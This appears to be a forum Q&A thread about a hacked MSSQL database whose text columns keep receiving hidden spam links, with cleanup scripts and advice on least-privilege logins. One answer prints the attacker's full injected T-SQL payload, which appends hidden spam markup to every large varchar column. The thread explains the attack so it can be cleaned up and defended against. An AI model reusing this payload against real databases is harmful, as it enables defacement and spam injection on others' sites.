MSSQL Server injected with hidden spam links, any ultimate solution?

Time: 2015-09-14 10:49:25

Tags: asp.net sql-server database sql-injection spam

I am using MSSQL Server 2012. The website connected to this database was developed in ASP.NET C# 2012. Recently my database was hacked, or injected with spam links; they are all the same:

<div style="display:none"> .....

With some help I created a function that cleans the updated fields, but the problem is that a few days later the same thing happens again!

I could keep cleaning the database, but I am trying to find an ultimate solution that prevents this from happening for good... any ideas?

  • Note: I noticed that most of the updated columns are "nvarchar" text fields.

2 answers:

Answer 0: (score: 5)

In my case it was also SQL injection through unvalidated URL request parameters.

Let's start with the obvious:


Interestingly (read: stupidly enough), I had configured the same SQL Server user for several databases, so not only the database of the vulnerable ASP.NET application was compromised, but also the databases of other, non-vulnerable ASP.NET applications on the same server.

Cleanup

Here is a small SQL script that searches through all tables of one database and outputs the SQL query to clean up the tables in question:

DECLARE
    @search_string  VARCHAR(100),
    @table_name     SYSNAME,
    @table_id       INT,
    @column_name    SYSNAME,
    @sql_string     VARCHAR(2000)

SET @search_string = 'display:none' -- The spammy text to search for.

DECLARE tables_cur CURSOR FOR SELECT name, object_id FROM sys.objects WHERE type = 'U' -- all user tables

OPEN tables_cur

FETCH NEXT FROM tables_cur INTO @table_name, @table_id

WHILE (@@FETCH_STATUS = 0)
BEGIN
    DECLARE columns_cur CURSOR FOR SELECT name FROM sys.columns WHERE object_id = @table_id AND system_type_id IN (167, 175, 231, 239) -- varchar, char, nvarchar, nchar

    OPEN columns_cur

    FETCH NEXT FROM columns_cur INTO @column_name
    WHILE (@@FETCH_STATUS = 0)
    BEGIN
        SET @sql_string = 'IF EXISTS (SELECT * FROM [' + @table_name + '] WHERE [' + @column_name + '] LIKE ''%' + @search_string + '%'') PRINT '' update [' + @table_name + '] set [' + @column_name + '] = substring([' + @column_name + '], 1, charindex(''''<'''', [' + @column_name + '])-1) where [' + @column_name + '] like ''''%<%'''''''
        --PRINT @sql_string
        EXECUTE(@sql_string)

        FETCH NEXT FROM columns_cur INTO @column_name
    END

    CLOSE columns_cur

    DEALLOCATE columns_cur

    FETCH NEXT FROM tables_cur INTO @table_name, @table_id
END

CLOSE tables_cur

DEALLOCATE tables_cur

For a non-compromised database this prints nothing; otherwise it prints something like:

update [MyTable1] set [MyColumn] = substring([MyColumn], 1, charindex('<', [MyColumn])-1) where [MyColumn] like '%<%'
update [MyTable2] set [MyColumn] = substring([MyColumn], 1, charindex('<', [MyColumn])-1) where [MyColumn] like '%<%'
update [MyTable3] set [MyColumn] = substring([MyColumn], 1, charindex('<', [MyColumn])-1) where [MyColumn] like '%<%'
update [MyTable4] set [MyColumn] = substring([MyColumn], 1, charindex('<', [MyColumn])-1) where [MyColumn] like '%<%'

After that you can execute the generated SQL.

Note that it removes everything from the first < onwards. This may not be appropriate for columns that intentionally contain markup / HTML / XML.

Let's finish with the other obvious thing:


Injected SQL

Just for the record, or in case anyone is interested, here is the extracted, valid SQL the spammer used:

declare @c cursor;
declare @d varchar(4000);

set @c=cursor for select 'update ['+TABLE_NAME+
    '] set ['+COLUMN_NAME+']=['+COLUMN_NAME+
    ']+case ABS(CHECKSUM(NewId()))%7 when 0 then ''''
    +char(60)+''div style="display:none"''+char(62)+
    ''go ''+char(60)+''a href="http:''+char(47)+char(47)+
    ''blog.armanda.com''+ char(47)+''page''+char(47)+
    ''women-who-cheat-with-
    married-men.aspx"''+char(62)+case ABS(CHECKSUM(
    NewId()))%3 when 0 then ''why do husbands cheat'' 
    when 1 then ''reasons why husband cheat'' else 
    ''want my wife to cheat'' end +char(60)+char(47)+
    ''a''+char(62)+'' My wife cheated on me''+
    char(60)+char(47)+''div''+char(62)+'''' else '''' 
    end' FROM sysindexes AS i INNER JOIN sysobjects AS 
    o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS 
    ON o.NAME=TABLE_NAME WHERE(indid=0 or indid=1) and 
    DATA_TYPE like '%varchar' and(CHARACTER_MAXIMUM_LENGTH=-1 
    or CHARACTER_MAXIMUM_LENGTH=2147483647);

open @c;
fetch next from @c into @d;
while @@FETCH_STATUS=0 
begin 
    exec (@d);
    fetch next from @c into @d;
end;
close @c

I inserted line breaks for readability.

The raw URL straight from the server log looked like this:

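The answer above found one SQL Server login mapped into several databases, so a single injected request could rewrite data in all of them. As an added example (not the answer author's code; login, database and object names are assumptions), here is that weak arrangement next to a per-application login that holds only the rights its own site needs:

```sql
-- Added example, not from the answer above. All names are assumptions.

/* Weak setting described in the answer: one login, mapped into every
   application database with full rights. An injected UPDATE from one site
   then reaches every other site's tables.

CREATE LOGIN WebApps WITH PASSWORD = '...';
USE SiteA; CREATE USER WebApps FOR LOGIN WebApps; ALTER ROLE db_owner ADD MEMBER WebApps;
USE SiteB; CREATE USER WebApps FOR LOGIN WebApps; ALTER ROLE db_owner ADD MEMBER WebApps;
*/

-- Corrected: one login per application, mapped into only its own database.
CREATE LOGIN SiteA_App WITH PASSWORD = 'ReplaceWithAStrongGeneratedPassword!1';
GO
USE SiteA;
GO
CREATE USER SiteA_App FOR LOGIN SiteA_App WITH DEFAULT_SCHEMA = dbo;
GO
-- The pages only read the tables they render; no blanket UPDATE right exists,
-- so a payload that tries to append markup to every varchar column is denied.
GRANT SELECT ON dbo.Details TO SiteA_App;
-- Writes the site legitimately needs go through stored procedures.
GRANT EXECUTE ON SCHEMA::dbo TO SiteA_App;
GO
-- Verify what the login can actually do before pointing the site at it.
EXECUTE AS USER = 'SiteA_App';
SELECT permission_name, class_desc
FROM fn_my_permissions('dbo.Details', 'OBJECT');
REVERT;
GO
```

Repeat the CREATE LOGIN / CREATE USER pair for each site (SiteB_App and so on); no login should be a user in more than one application database.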

Answer 1: (score: 0)

You can use this code:

Clear all nvarchar columns of the SQL database tables
-- T-SQL has no backslash escaping, so the search pattern must contain plain
-- double quotes; a pattern written as \"display:none\" never matches.
-- Keeps the text before the injected block and drops everything after it.
update table_name set column_name = SUBSTRING(column_name, 0,
    CharIndex('<div style="display:none">', column_name))
where column_name like '%<div style="display:none">%'
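Both cleanup statements on this page (the generated UPDATEs in answer 0 and the one in answer 1) cut the column off at the injected markup, which answer 0 itself warns is wrong for columns that legitimately hold HTML. The following is an added example, not code from either answer: it removes only the injected <div style="display:none">...</div> blocks, repeating until none remain, and runs against a constructed table variable (table and column names are assumptions).

```sql
-- Added example (not from either answer). Strips only the injected hidden
-- div blocks and leaves any legitimate markup in the column untouched.
DECLARE @marker NVARCHAR(50) = N'<div style="display:none">';
DECLARE @closer NVARCHAR(10) = N'</div>';

-- Constructed sample rows so the script runs stand-alone; in practice
-- replace @t / Description with the affected table and column.
DECLARE @t TABLE (Id INT, Description NVARCHAR(MAX));
INSERT INTO @t (Id, Description) VALUES
  (1, N'Plain text<div style="display:none">go <a href="http://spam.example/x">a</a> b</div>'),
  (2, N'<b>Legit</b> markup<div style="display:none">s1</div> tail<div style="display:none">s2</div>'),
  (3, N'Untouched <b>row</b> with a legitimate <div>block</div>');

-- Each pass removes the first remaining injected block per row.
-- CHARINDEX is given the marker position as its start, so a legitimate
-- </div> that appears before the injected block is never chosen.
WHILE 1 = 1
BEGIN
    UPDATE @t
    SET Description = STUFF(
        Description,
        CHARINDEX(@marker, Description),
        CHARINDEX(@closer, Description, CHARINDEX(@marker, Description))
            + LEN(@closer) - CHARINDEX(@marker, Description),
        N'')
    WHERE CHARINDEX(@marker, Description) > 0
      AND CHARINDEX(@closer, Description, CHARINDEX(@marker, Description)) > 0;

    -- Rows with a marker but no closing tag (truncated by the column length)
    -- are skipped by the WHERE clause, so the loop always terminates.
    IF @@ROWCOUNT = 0 BREAK;
END;

SELECT Id, Description FROM @t ORDER BY Id;
```

To apply it to a whole database, feed the real table and column names into this UPDATE from the cursor script in answer 0 instead of its PRINT statement.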